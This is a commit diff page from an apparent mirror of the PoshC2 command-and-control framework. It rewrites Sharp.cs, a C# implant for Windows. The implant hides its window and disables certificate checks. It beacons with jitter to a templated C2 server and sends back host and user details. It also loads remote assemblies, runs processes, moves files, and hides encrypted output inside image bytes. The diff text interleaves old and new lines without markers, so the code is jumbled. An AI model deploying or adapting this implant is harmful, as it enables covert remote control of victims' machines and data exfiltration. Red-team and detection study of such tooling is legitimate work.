infosecn1nja
/
PoshC2_Python
mirror of https://github.com/infosecn1nja/PoshC2_Python.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update sharp.cs 

[+] use of ManualResetEvents instead of Thread.Sleep
[+] Add Jitter to beacontime
[+] General tidy up
chunking
rolen 2019-01-03 18:33:10 +00:00
parent 782429387f
commit 205d4f3693
1 changed files with 432 additions and 493 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

925
Files/Sharp.cs
View File

@ -16,519 +16,458 @@ using System.Collections.Generic;
public class Program public class Program
{ {
[DllImport("kernel32.dll")] [DllImport("kernel32.dll")]
static extern IntPtr GetConsoleWindow(); static extern IntPtr GetConsoleWindow();
[DllImport("user32.dll")] [DllImport("user32.dll")]
static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
public const int SW_HIDE = 0; public const int SW_HIDE = 0;
public const int SW_SHOW = 5; public const int SW_SHOW = 5;
public static string scode = ""; public static string scode = "";
public static string proc = @"c:\windows\system32\netsh.exe"; public static string proc = @"c:\windows\system32\netsh.exe";
public static void Sharp() public static void Sharp()
{ {
var handle = GetConsoleWindow(); var handle = GetConsoleWindow();
ShowWindow(handle, SW_HIDE); ShowWindow(handle, SW_HIDE);
AllowUntrustedCertificates(); AllowUntrustedCertificates();
try { primer(); } catch { } try { primer(); } catch { }
Thread.Sleep(300000); var mre = new System.Threading.ManualResetEvent(false);
try { primer(); } catch { } mre.WaitOne(300000);
Thread.Sleep(600000); try { primer(); } catch { }
try { primer(); } catch { } mre.WaitOne(600000);
} try { primer(); } catch { }
}
public static void Main() public static void Main()
{ {
Sharp(); Sharp();
} }
static byte[] Combine(byte[] first, byte[] second)
{
byte[] ret = new byte[first.Length + second.Length];
Buffer.BlockCopy(first, 0, ret, 0, first.Length);
Buffer.BlockCopy(second, 0, ret, first.Length, second.Length);
return ret;
}
static System.Net.WebClient GetWebRequest(string cookie) static byte[] Combine(byte[] first, byte[] second)
{ {
var x = new System.Net.WebClient(); byte[] ret = new byte[first.Length + second.Length];
Buffer.BlockCopy(first, 0, ret, 0, first.Length);
string purl = "#REPLACEPROXYURL#"; Buffer.BlockCopy(second, 0, ret, first.Length, second.Length);
string puser = "#REPLACEPROXYUSER#"; return ret;
string ppass = "#REPLACEPROXYPASSWORD#"; }
if (!String.IsNullOrEmpty(purl)) {
WebProxy proxy = new WebProxy();
proxy.Address = new Uri(purl);
proxy.Credentials = new NetworkCredential(puser, ppass);
proxy.UseDefaultCredentials = false;
proxy.BypassProxyOnLocal = false;
x.Proxy = proxy;
}
string df = "#REPLACEDF#"; static System.Net.WebClient GetWebRequest(string cookie)
if (!String.IsNullOrEmpty(df)) { {
x.Headers.Add("Host",df); var x = new System.Net.WebClient();
}
x.Headers.Add("User-Agent", "#REPLACEUSERAGENT#"); var purl = "#REPLACEPROXYURL#";
x.Headers.Add("Referer", "#REPLACEREFERER#"); var puser = "#REPLACEPROXYUSER#";
var ppass = "#REPLACEPROXYPASSWORD#";
if (cookie != null) if (!String.IsNullOrEmpty(purl))
{ {
x.Headers.Add(System.Net.HttpRequestHeader.Cookie, $"SessionID={cookie}"); WebProxy proxy = new WebProxy();
} proxy.Address = new Uri(purl);
proxy.Credentials = new NetworkCredential(puser, ppass);
return x; proxy.UseDefaultCredentials = false;
} proxy.BypassProxyOnLocal = false;
x.Proxy = proxy;
}
static string Decryption(string key, string enc) var df = "#REPLACEDF#";
{ if (!String.IsNullOrEmpty(df))
var b = System.Convert.FromBase64String(enc); x.Headers.Add("Host", df);
Byte[] IV = new Byte[16];
Array.Copy(b, IV, 16);
try {
var a = CAMR(key, System.Convert.ToBase64String(IV));
var d = a.CreateDecryptor();
var u = d.TransformFinalBlock(b, 16, b.Length - 16);
return System.Text.Encoding.UTF8.GetString(u);
} catch {
var a = CAMA(key, System.Convert.ToBase64String(IV));
var d = a.CreateDecryptor();
var u = d.TransformFinalBlock(b, 16, b.Length - 16);
return System.Text.Encoding.UTF8.GetString(u);
}
} x.Headers.Add("User-Agent", "#REPLACEUSERAGENT#");
x.Headers.Add("Referer", "#REPLACEREFERER#");
static string Encryption(string key, string un, bool comp = false, byte[] unByte = null) if (null != cookie)
{ x.Headers.Add(System.Net.HttpRequestHeader.Cookie, $"SessionID={cookie}");
byte[] b = null;
if (unByte != null) {
b = unByte;
} else {
b = System.Text.Encoding.UTF8.GetBytes(un);
}
byte[] byEnc = b;
if (comp){
byEnc = Compress(b);
}
try {
var a = CAMR(key, null);
var e = a.CreateEncryptor();
var f = e.TransformFinalBlock(byEnc, 0, byEnc.Length);
byte[] p = null;
p = Combine(a.IV, f);
return System.Convert.ToBase64String(p);
} catch {
var a = CAMA(key, null);
var e = a.CreateEncryptor();
var f = e.TransformFinalBlock(byEnc, 0, byEnc.Length);
byte[] p = null;
p = Combine(a.IV, f);
return System.Convert.ToBase64String(p);
}
}
static System.Security.Cryptography.AesCryptoServiceProvider CAMA(string key,string IV) return x;
{ }
System.Security.Cryptography.AesCryptoServiceProvider b = new System.Security.Cryptography.AesCryptoServiceProvider();
b.Mode = System.Security.Cryptography.CipherMode.CBC;
b.Padding = System.Security.Cryptography.PaddingMode.Zeros;
b.BlockSize = 128;
b.KeySize = 256;
if (IV != null)
{
b.IV = System.Convert.FromBase64String(IV);
}
if (key != null)
{
b.Key = System.Convert.FromBase64String(key);
}
return b;
}
static System.Security.Cryptography.RijndaelManaged CAMR(string key,string IV)
{
System.Security.Cryptography.RijndaelManaged a = new System.Security.Cryptography.RijndaelManaged();
a.Mode = System.Security.Cryptography.CipherMode.CBC;
a.Padding = System.Security.Cryptography.PaddingMode.Zeros;
a.BlockSize = 128;
a.KeySize = 256;
if (IV != null)
{
a.IV = System.Convert.FromBase64String(IV);
}
if (key != null)
{
a.Key = System.Convert.FromBase64String(key);
}
return a;
}
static void AllowUntrustedCertificates() static string Decryption(string key, string enc)
{ {
try var b = System.Convert.FromBase64String(enc);
{ var IV = new Byte[16];
System.Net.ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(delegate { return true; } ); Array.Copy(b, IV, 16);
} try
catch { } {
} var a = CreateCam(key, System.Convert.ToBase64String(IV));
var u = a.CreateDecryptor().TransformFinalBlock(b, 16, b.Length - 16);
return System.Text.Encoding.UTF8.GetString(u);
}
catch
{
var a = CreateCam(key, System.Convert.ToBase64String(IV), false);
var u = a.CreateDecryptor().TransformFinalBlock(b, 16, b.Length - 16);
return System.Text.Encoding.UTF8.GetString(u);
}
finally
{
Array.Clear(b, 0, b.Length);
Array.Clear(IV, 0, 16);
}
}
static void primer() static string Encryption(string key, string un, bool comp = false, byte[] unByte = null)
{ {
DateTime now = DateTime.Now; byte[] byEnc = null;
DateTime killDate = Convert.ToDateTime("#REPLACEKILLDATE#"); if (unByte != null)
if (killDate < now){ byEnc = unByte;
//Console.ReadLine(); else
} else { byEnc = System.Text.Encoding.UTF8.GetBytes(un);
var u = System.Security.Principal.WindowsIdentity.GetCurrent().Name;
var dn = System.Environment.UserDomainName;
var cn = System.Environment.GetEnvironmentVariable("COMPUTERNAME");
var arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
int pid = Process.GetCurrentProcess().Id;
Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir");
string o = $"{dn};{u};{cn};{arch};{pid};#REPLACEBASEURL#";
string key = "#REPLACEKEY#";
var pp = Encryption(key, o);
string baseURL = "#REPLACEBASEURL#";
string s = "#REPLACESTARTURL#";
var primer = GetWebRequest(pp).DownloadString(s);
var x = Decryption(key, primer);
Regex re = new Regex("RANDOMURI19901(.*)10991IRUMODNAR");
Match m = re.Match(x);
string RandomURI = m.Groups[1].ToString();
re = new Regex("URLS10484390243(.*)34209348401SLRU");
m = re.Match(x);
string URLS = m.Groups[1].ToString();
re = new Regex("KILLDATE1665(.*)5661ETADLLIK");
m = re.Match(x);
var KillDate = m.Groups[1].ToString();
re = new Regex("SLEEP98001(.*)10089PEELS");
m = re.Match(x);
var Sleep = m.Groups[1].ToString();
re = new Regex("NEWKEY8839394(.*)4939388YEKWEN");
m = re.Match(x);
var NewKey = m.Groups[1].ToString();
re = new Regex("IMGS19459394(.*)49395491SGMI");
m = re.Match(x);
var IMGs = m.Groups[1].ToString();
ImplantCore(baseURL, RandomURI, URLS, KillDate, Sleep, NewKey, IMGs);
}
} if (comp)
byEnc = Compress(byEnc);
try
{
var a = CreateCam(key, null);
var f = a.CreateEncryptor().TransformFinalBlock(byEnc, 0, byEnc.Length);
return System.Convert.ToBase64String(Combine(a.IV, f));
}
catch
{
var a = CreateCam(key, null, false);
var f = a.CreateEncryptor().TransformFinalBlock(byEnc, 0, byEnc.Length);
return System.Convert.ToBase64String(Combine(a.IV, f));
}
}
static System.Security.Cryptography.SymmetricAlgorithm CreateCam(string key, string IV, bool rij = true)
{
System.Security.Cryptography.SymmetricAlgorithm a = null;
if (rij)
a = new System.Security.Cryptography.RijndaelManaged();
else
a = new System.Security.Cryptography.AesCryptoServiceProvider();
a.Mode = System.Security.Cryptography.CipherMode.CBC;
a.Padding = System.Security.Cryptography.PaddingMode.Zeros;
a.BlockSize = 128;
a.KeySize = 256;
static byte[] Compress(byte[] raw) if (null != IV)
{ a.IV = System.Convert.FromBase64String(IV);
using (MemoryStream memory = new MemoryStream()) else
{ a.GenerateIV();
using (GZipStream gzip = new GZipStream(memory, CompressionMode.Compress, true))
{
gzip.Write(raw, 0, raw.Length);
}
return memory.ToArray();
}
}
static byte[] GetImgData(byte[] cmdoutput, string[] stringnewIMGS)
{
Random rnd = new Random();
string randimg = stringnewIMGS[rnd.Next(stringnewIMGS.Length)];
byte[] imgBytes = System.Convert.FromBase64String(randimg);
var maxByteslen = 1500;
var maxDatalen = 1500 + cmdoutput.Length;
var imageByteslen = imgBytes.Length;
var paddingByteslen = maxByteslen - imageByteslen;
var BytePadding = System.Text.Encoding.UTF8.GetBytes((RandomString(paddingByteslen)));
var ImageBytesFull = new byte[maxDatalen];
System.Array.Copy(imgBytes, 0, ImageBytesFull, 0, imgBytes.Length);
System.Array.Copy(BytePadding, 0, ImageBytesFull, imgBytes.Length, BytePadding.Length);
System.Array.Copy(cmdoutput, 0, ImageBytesFull, imgBytes.Length + BytePadding.Length, cmdoutput.Length);
return ImageBytesFull;
}
static Random random = new Random(); if (null != key)
a.Key = System.Convert.FromBase64String(key);
static string RandomString(int length)
{
const string chars = "...................@..........................Tyscf";
return new string(Enumerable.Repeat(chars, length).Select(s => s[random.Next(s.Length)]).ToArray());
}
static Type LoadSomething(string assemblyQualifiedName) return a;
{ }
// Throws exception is type was not found static void AllowUntrustedCertificates()
return Type.GetType( {
assemblyQualifiedName, try
(name) => {
{ System.Net.ServicePointManager.ServerCertificateValidationCallback = (z, y, x, w) => { return true; };
// Returns the assembly of the type by enumerating loaded assemblies }
// in the app domain catch { }
return AppDomain.CurrentDomain.GetAssemblies().Where(z => z.FullName == name.FullName).FirstOrDefault(); }
},
null,
true);
}
static void ImplantCore(string baseURL, string RandomURI, string stringURLS, string KillDate, string Sleep, string Key, string stringIMGS)
{
var re = new Regex("(?<=\")[^\"]*(?=\")|[^\" ]+");
string strURLS = stringURLS.Replace(",",""); static void primer()
strURLS = strURLS.Replace(" ",""); {
var stringnewURLS = re.Matches(strURLS).Cast<Match>().Select(m => m.Value).ToArray(); if (Convert.ToDateTime("#REPLACEKILLDATE#") > DateTime.Now)
stringnewURLS = stringnewURLS.Where(m => !string.IsNullOrEmpty(m)).ToArray(); {
var u = System.Security.Principal.WindowsIdentity.GetCurrent().Name;
var dn = System.Environment.UserDomainName;
var cn = System.Environment.GetEnvironmentVariable("COMPUTERNAME");
var arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
int pid = Process.GetCurrentProcess().Id;
Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir");
var o = $"{dn};{u};{cn};{arch};{pid};#REPLACEBASEURL#";
String key = "#REPLACEKEY#", baseURL = "#REPLACEBASEURL#", s = "#REPLACESTARTURL#";
string strIMGS = stringIMGS.Replace(",",""); var primer = GetWebRequest(Encryption(key, o)).DownloadString(s);
var stringnewIMGS = re.Matches(strIMGS).Cast<Match>().Select(m => m.Value).ToArray(); var x = Decryption(key, primer);
stringnewIMGS = stringnewIMGS.Where(m => !string.IsNullOrEmpty(m)).ToArray();
int beacontime = 5; var re = new Regex("RANDOMURI19901(.*)10991IRUMODNAR");
var m = re.Match(x);
if (!Int32.TryParse(Sleep, out beacontime)) string RandomURI = m.Groups[1].ToString();
{
beacontime = 5;
}
var strOutput = new StringWriter();
Console.SetOut(strOutput);
bool bExit = true;
while(bExit)
{
Random rnd = new Random();
string URL = stringnewURLS[rnd.Next(stringnewURLS.Length)];
string G = (Guid.NewGuid()).ToString();
URL = baseURL+"/"+URL+G+"/?"+RandomURI;
Thread.Sleep(beacontime*1000);
DateTime now = DateTime.Now;
DateTime killDate = Convert.ToDateTime(KillDate);
if (killDate < now){
bExit = false;
}
string output = "";
try {
string cmd = null;
string x = "";
string tasksrc = "";
try {
cmd = GetWebRequest(null).DownloadString(URL);
x = Decryption(Key, cmd);
x = x.Replace("\0", string.Empty);
} catch {}
if (x.ToLower().StartsWith("multicmd"))
{
string splitcmd = x.Replace("multicmd","");
string[] split = splitcmd.Split(new string[] {"!d-3dion@LD!-d"}, StringSplitOptions.RemoveEmptyEntries);
foreach (string c in split)
{
tasksrc = c;
output = "";
//add upload-file
if (c.ToLower().StartsWith("loadmodule")){
string module = Regex.Replace(c, "loadmodule", "", RegexOptions.IgnoreCase);
Assembly assembly = System.Reflection.Assembly.Load(System.Convert.FromBase64String(module));
output += "Module loaded sucessfully";
tasksrc = "Module loaded sucessfully";
}
if (c.ToLower().StartsWith("upload-file")){ re = new Regex("URLS10484390243(.*)34209348401SLRU");
string path = Regex.Replace(c, "upload-file", "", RegexOptions.IgnoreCase); m = re.Match(x);
string[] splitargs = path.Split(new string[] {";"}, StringSplitOptions.RemoveEmptyEntries); string URLS = m.Groups[1].ToString();
Console.WriteLine("Uploaded file to: " + splitargs[1]);
byte[] fileBytes = Convert.FromBase64String(splitargs[0]);
System.IO.File.WriteAllBytes(splitargs[1].Replace("\"", ""), fileBytes);
tasksrc = "Uploaded file sucessfully";
}
if (c.ToLower().StartsWith("download-file")){ re = new Regex("KILLDATE1665(.*)5661ETADLLIK");
string path = Regex.Replace(c, "download-file ", "", RegexOptions.IgnoreCase); m = re.Match(x);
byte[] file = File.ReadAllBytes(path.Replace("\"", "")); var KillDate = m.Groups[1].ToString();
byte[] fileChuck = Combine(Encoding.ASCII.GetBytes("0000100001"), file);
URL = stringnewURLS[rnd.Next(stringnewURLS.Length)];
G = (Guid.NewGuid()).ToString();
URL = baseURL+"/"+URL+G+"/?"+RandomURI;
string dtask = Encryption(Key, c);
string dcoutput = Encryption(Key, "", true, fileChuck);
byte[] doutputBytes = System.Convert.FromBase64String(dcoutput);
byte[] dsendBytes = GetImgData(doutputBytes, stringnewIMGS);
GetWebRequest(dtask).UploadData(URL, dsendBytes);
}
if (c.ToLower().StartsWith("listmodules")){
var appd = AppDomain.CurrentDomain.GetAssemblies();
output += "[+] Modules loaded: \n\n";
foreach (var ass in appd)
{
output += ass.FullName.ToString() + "\n";
}
}
if (c.ToLower().StartsWith("$shellcode")){
string sc = c.Substring(13,c.Length - 13);
sc = sc.Replace("\"", "");
scode = sc;
}
if (c.ToLower().StartsWith("run-dll") || c.ToLower().StartsWith("run-exe")){ re = new Regex("SLEEP98001(.*)10089PEELS");
string[] splitargs = c.Split(new string[] {" "}, StringSplitOptions.RemoveEmptyEntries); m = re.Match(x);
int i = 0; var Sleep = m.Groups[1].ToString();
string method = "";
string splittheseargs = "";
string qualifiedname = "";
string name = "";
foreach (string a in splitargs) {
if (i == 1){
qualifiedname = a;
}
if (i == 2){
name = a;
}
if (c.ToLower().StartsWith("run-exe")) {
if (i > 2){
splittheseargs = splittheseargs + " " + a;
}
} else {
if (i == 3){
method = a;
}
if (i > 3){
splittheseargs = splittheseargs + " " + a;
}
}
i ++;
}
string[] splitnewargs = splittheseargs.Split(new string[] { " " }, StringSplitOptions.RemoveEmptyEntries);
var myList = new List<string>();
foreach (var arg in splitnewargs) {
myList.Add(arg);
}
var AppDomainAss = AppDomain.CurrentDomain.GetAssemblies();
foreach (var Ass in AppDomainAss)
{
if (Ass.FullName.ToString().ToLower().StartsWith(name.ToLower()))
{
var loadedType = LoadSomething(qualifiedname + ", " + Ass.FullName);
try {
if (c.ToLower().StartsWith("run-exe")) {
var xxx = loadedType.Assembly.EntryPoint.Invoke(null, new object[] { myList.ToArray() });
output = xxx.ToString();
} else {
try {
var xxx = loadedType.Assembly.GetType(qualifiedname).InvokeMember(method, BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, new object[] { myList.ToArray() });
output = xxx.ToString();
} catch {
var xxx = loadedType.Assembly.GetType(qualifiedname).InvokeMember(method, BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, null);
output = xxx.ToString();
}
}
} catch { }
}
}
}
if (c.ToLower().StartsWith("exit")){
bExit = false;
}
if (c.ToLower().StartsWith("start-process")){
string proc = c.Replace("'", "");
proc = proc.Replace("\"", "");
string pstart = Regex.Replace(proc, "start-process ", "", RegexOptions.IgnoreCase);
pstart = Regex.Replace(pstart, "-argumentlist(.*)", "", RegexOptions.IgnoreCase);
string args = Regex.Replace(proc, "(.*)argumentlist ", "", RegexOptions.IgnoreCase);
Process p = new Process();
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.StartInfo.CreateNoWindow = true;
p.StartInfo.FileName = pstart;
p.StartInfo.Arguments = args;
p.Start();
output = p.StandardOutput.ReadToEnd();
output = output + p.StandardError.ReadToEnd();
p.WaitForExit();
}
if (c.ToLower().StartsWith("setbeacon") || c.ToLower().StartsWith("beacon")) {
string beacon = Regex.Replace(c, "setbeacon ", "", RegexOptions.IgnoreCase);
beacon = Regex.Replace(beacon, "beacon ", "", RegexOptions.IgnoreCase);
if (beacon.ToLower().Contains("s"))
{
beacon = Regex.Replace(beacon, "s", "", RegexOptions.IgnoreCase);
if (!Int32.TryParse(beacon, out beacontime))
{
beacontime = 5;
}
}
else if (beacon.ToLower().Contains("m"))
{
beacon = Regex.Replace(beacon, "m", "", RegexOptions.IgnoreCase);
if (!Int32.TryParse(beacon, out beacontime))
{
beacontime = 5;
}
beacontime = beacontime * 60;
}
else if (beacon.ToLower().Contains("h"))
{
beacon = Regex.Replace(beacon, "h", "", RegexOptions.IgnoreCase);
if (!Int32.TryParse(beacon, out beacontime))
{
beacontime = 5;
}
beacontime = beacontime * 60;
beacontime = beacontime * 60;
}
else if (!Int32.TryParse(beacon, out beacontime))
{
beacontime = 5;
}
}
output += strOutput.ToString(); re = new Regex("NEWKEY8839394(.*)4939388YEKWEN");
StringBuilder sb = strOutput.GetStringBuilder(); m = re.Match(x);
sb.Remove(0, sb.Length); var NewKey = m.Groups[1].ToString();
URL = stringnewURLS[rnd.Next(stringnewURLS.Length)];
G = (Guid.NewGuid()).ToString(); re = new Regex("IMGS19459394(.*)49395491SGMI");
URL = baseURL+"/"+URL+G+"/?"+RandomURI; m = re.Match(x);
if (tasksrc.Length > 200) { var IMGs = m.Groups[1].ToString();
tasksrc = tasksrc.Substring(0,199);
} ImplantCore(baseURL, RandomURI, URLS, KillDate, Sleep, NewKey, IMGs);
string task = Encryption(Key, tasksrc); }
string coutput = Encryption(Key, output, true); }
byte[] outputBytes = System.Convert.FromBase64String(coutput);
byte[] sendBytes = GetImgData(outputBytes, stringnewIMGS); static byte[] Compress(byte[] raw)
GetWebRequest(task).UploadData(URL, sendBytes); {
} using (var memory = new MemoryStream())
} using (var gzip = new GZipStream(memory, CompressionMode.Compress, true))
} catch (Exception e) { {
URL = stringnewURLS[rnd.Next(stringnewURLS.Length)]; gzip.Write(raw, 0, raw.Length);
URL = baseURL+"/"+URL+RandomURI; return memory.ToArray();
string task = Encryption(Key, "Error"); }
string eroutput = Encryption(Key, "Error: " + output + e, true); }
byte[] outputBytes = System.Convert.FromBase64String(eroutput);
byte[] sendBytes = GetImgData(outputBytes, stringnewIMGS); static Type LoadSomething(string assemblyQualifiedName)
GetWebRequest(task).UploadData(URL, sendBytes); {
} return Type.GetType(assemblyQualifiedName, (name) =>
} {
} return AppDomain.CurrentDomain.GetAssemblies().Where(z => z.FullName == name.FullName).FirstOrDefault();
} }, null, true);
}
internal static class UrlGen
{
static List<String> _stringnewURLS = new List<String>();
static String _randomURI;
static String _baseUrl;
static Random _rnd = new Random();
static Regex _re = new Regex("(?<=\")[^\"]*(?=\")|[^\" ]+", RegexOptions.Compiled);
internal static void Init(string stringURLS, String RandomURI, String baseUrl)
{
_stringnewURLS = _re.Matches(stringURLS.Replace(",", "").Replace(" ", "")).Cast<Match>().Select(m => m.Value).Where(m => !string.IsNullOrEmpty(m)).ToList();
_randomURI = RandomURI;
_baseUrl = baseUrl;
}
internal static String GenerateUrl()
{
string URL = _stringnewURLS[_rnd.Next(_stringnewURLS.Count)];
return $"{_baseUrl}/{URL}{Guid.NewGuid()}/?{_randomURI}";
}
}
internal static class ImgGen
{
static Random _rnd = new Random();
static Regex _re = new Regex("(?<=\")[^\"]*(?=\")|[^\" ]+", RegexOptions.Compiled);
static List<String> _newImgs = new List<String>();
internal static void Init(String stringIMGS)
{
var stringnewIMGS = _re.Matches(stringIMGS.Replace(",", "")).Cast<Match>().Select(m => m.Value);
stringnewIMGS = stringnewIMGS.Where(m => !string.IsNullOrEmpty(m));
}
static string RandomString(int length)
{
const string chars = "...................@..........................Tyscf";
return new string(Enumerable.Repeat(chars, length).Select(s => s[_rnd.Next(s.Length)]).ToArray());
}
internal static byte[] GetImgData(byte[] cmdoutput)
{
Int32 maxByteslen = 1500, maxDatalen = cmdoutput.Length + maxByteslen;
var randimg = _newImgs[(new Random()).Next(0, _newImgs.Count)];
var imgBytes = System.Convert.FromBase64String(randimg);
var BytePadding = System.Text.Encoding.UTF8.GetBytes((RandomString(maxByteslen - imgBytes.Length)));
var ImageBytesFull = new byte[maxDatalen];
System.Array.Copy(imgBytes, 0, ImageBytesFull, 0, imgBytes.Length);
System.Array.Copy(BytePadding, 0, ImageBytesFull, imgBytes.Length, BytePadding.Length);
System.Array.Copy(cmdoutput, 0, ImageBytesFull, imgBytes.Length + BytePadding.Length, cmdoutput.Length);
return ImageBytesFull;
}
}
static void ImplantCore(string baseURL, string RandomURI, string stringURLS, string KillDate, string Sleep, string Key, string stringIMGS)
{
UrlGen.Init(stringURLS, RandomURI, baseURL);
ImgGen.Init(stringIMGS);
if (!Int32.TryParse(Sleep, out int beacontime))
beacontime = 5;
var strOutput = new StringWriter();
Console.SetOut(strOutput);
var exitvt = new ManualResetEvent(false);
var output = new StringBuilder();
while (!exitvt.WaitOne((int)(beacontime * 1000 * (((new Random()).Next(0, 2) > 0) ? 1.05 : 0.95))))
{
if (Convert.ToDateTime(KillDate) > DateTime.Now)
{
exitvt.Set();
continue;
}
output.Length = 0;
try
{
String x = "", tasksrc = "", cmd = null;
try
{
cmd = GetWebRequest(null).DownloadString(UrlGen.GenerateUrl());
x = Decryption(Key, cmd).Replace("\0", string.Empty);
}
catch
{
continue;
} //CAN YOU CONTINUE FROM THIS POINT?
if (x.ToLower().StartsWith("multicmd"))
{
var splitcmd = x.Replace("multicmd", "");
var split = splitcmd.Split(new string[] { "!d-3dion@LD!-d" }, StringSplitOptions.RemoveEmptyEntries);
foreach (string c in split)
{
tasksrc = c;
if (c.ToLower().StartsWith("exit"))
{
exitvt.Set();
break;
}
else if (c.ToLower().StartsWith("loadmodule"))
{
var module = Regex.Replace(c, "loadmodule", "", RegexOptions.IgnoreCase);
var assembly = System.Reflection.Assembly.Load(System.Convert.FromBase64String(module));
output.AppendLine("Module loaded sucessfully");
tasksrc = "Module loaded sucessfully";
}
else if (c.ToLower().StartsWith("upload-file"))
{
var path = Regex.Replace(c, "upload-file", "", RegexOptions.IgnoreCase);
var splitargs = path.Split(new string[] { ";" }, StringSplitOptions.RemoveEmptyEntries);
Console.WriteLine("Uploaded file to: " + splitargs[1]);
var fileBytes = Convert.FromBase64String(splitargs[0]);
System.IO.File.WriteAllBytes(splitargs[1].Replace("\"", ""), fileBytes);
tasksrc = "Uploaded file sucessfully";
}
else if (c.ToLower().StartsWith("download-file"))
{
var path = Regex.Replace(c, "download-file ", "", RegexOptions.IgnoreCase);
var file = File.ReadAllBytes(path.Replace("\"", ""));
var fileChuck = Combine(Encoding.ASCII.GetBytes("0000100001"), file);
var dtask = Encryption(Key, c);
var dcoutput = Encryption(Key, "", true, fileChuck);
var doutputBytes = System.Convert.FromBase64String(dcoutput);
var dsendBytes = ImgGen.GetImgData(doutputBytes);
GetWebRequest(dtask).UploadData(UrlGen.GenerateUrl(), dsendBytes);
}
else if (c.ToLower().StartsWith("listmodules"))
{
var appd = AppDomain.CurrentDomain.GetAssemblies();
output.AppendLine("[+] Modules loaded:").AppendLine("");
foreach (var ass in appd)
output.AppendLine(ass.FullName.ToString());
}
else if (c.ToLower().StartsWith("$shellcode"))
scode = c.Substring(13, c.Length - 13).Replace("\"", "");
else if (c.ToLower().StartsWith("run-dll") || c.ToLower().StartsWith("run-exe"))
{
var splitargs = c.Split(new string[] { " " }, StringSplitOptions.RemoveEmptyEntries);
int i = 0;
string method = "", splittheseargs = "", qualifiedname = "", name = "";
foreach (var a in splitargs)
{
if (i == 1)
qualifiedname = a;
if (i == 2)
name = a;
if (c.ToLower().StartsWith("run-exe"))
if (i > 2)
splittheseargs = splittheseargs + " " + a;
else
if (i == 3)
method = a;
else if (i > 3)
splittheseargs = splittheseargs + " " + a;
i++;
}
var splitnewargs = splittheseargs.Split(new string[] { " " }, StringSplitOptions.RemoveEmptyEntries);
foreach (var Ass in AppDomain.CurrentDomain.GetAssemblies())
{
if (Ass.FullName.ToString().ToLower().StartsWith(name.ToLower()))
{
var loadedType = LoadSomething(qualifiedname + ", " + Ass.FullName);
try
{
if (c.ToLower().StartsWith("run-exe"))
output.AppendLine(loadedType.Assembly.EntryPoint.Invoke(null, new object[] { splitnewargs }).ToString());
else
{
try
{
output.AppendLine(loadedType.Assembly.GetType(qualifiedname).InvokeMember(method, BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, new object[] { splitnewargs }).ToString());
}
catch
{
output.AppendLine(loadedType.Assembly.GetType(qualifiedname).InvokeMember(method, BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, null).ToString());
}
}
}
catch { }
}
}
}
else if (c.ToLower().StartsWith("start-process"))
{
var proc = c.Replace("'", "").Replace("\"", "");
var pstart = Regex.Replace(proc, "start-process ", "", RegexOptions.IgnoreCase);
pstart = Regex.Replace(pstart, "-argumentlist(.*)", "", RegexOptions.IgnoreCase);
var args = Regex.Replace(proc, "(.*)argumentlist ", "", RegexOptions.IgnoreCase);
var p = new Process();
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = p.StartInfo.RedirectStandardError = p.StartInfo.CreateNoWindow = true;
p.StartInfo.FileName = pstart;
p.StartInfo.Arguments = args;
p.Start();
output.AppendLine(p.StandardOutput.ReadToEnd()).AppendLine(p.StandardError.ReadToEnd());
p.WaitForExit();
}
else if (c.ToLower().StartsWith("setbeacon") || c.ToLower().StartsWith("beacon"))
{
var bcnRgx = new Regex(@"(?<=(setbeacon|beacon)\s{1,})(?<t>[0-9]{1,9})(?<u>[h,m,s]{0,1})", RegexOptions.Compiled | RegexOptions.IgnoreCase);
var mch = bcnRgx.Match(c);
if (mch.Success)
{
beacontime = Int32.Parse(mch.Groups["t"].Value);
switch (mch.Groups["u"].Value)
{
case "h":
beacontime *= 3600;
break;
case "m":
beacontime *= 60;
break;
}
}
else
output.AppendLine($@"[X] Invalid time ""{c}""");
}
output.AppendLine(strOutput.ToString());
var sb = strOutput.GetStringBuilder();
sb.Remove(0, sb.Length);
if (tasksrc.Length > 200)
tasksrc = tasksrc.Substring(0, 199);
var task = Encryption(Key, tasksrc);
var coutput = Encryption(Key, output.ToString(), true);
var outputBytes = System.Convert.FromBase64String(coutput);
var sendBytes = ImgGen.GetImgData(outputBytes);
GetWebRequest(task).UploadData(UrlGen.GenerateUrl(), sendBytes);
}
}
}
catch (Exception e)
{
var task = Encryption(Key, "Error");
var eroutput = Encryption(Key, $"Error: {output.ToString()} {e}", true);
var outputBytes = System.Convert.FromBase64String(eroutput);
var sendBytes = ImgGen.GetImgData(outputBytes);
GetWebRequest(task).UploadData(UrlGen.GenerateUrl(), sendBytes);
}
}
}
}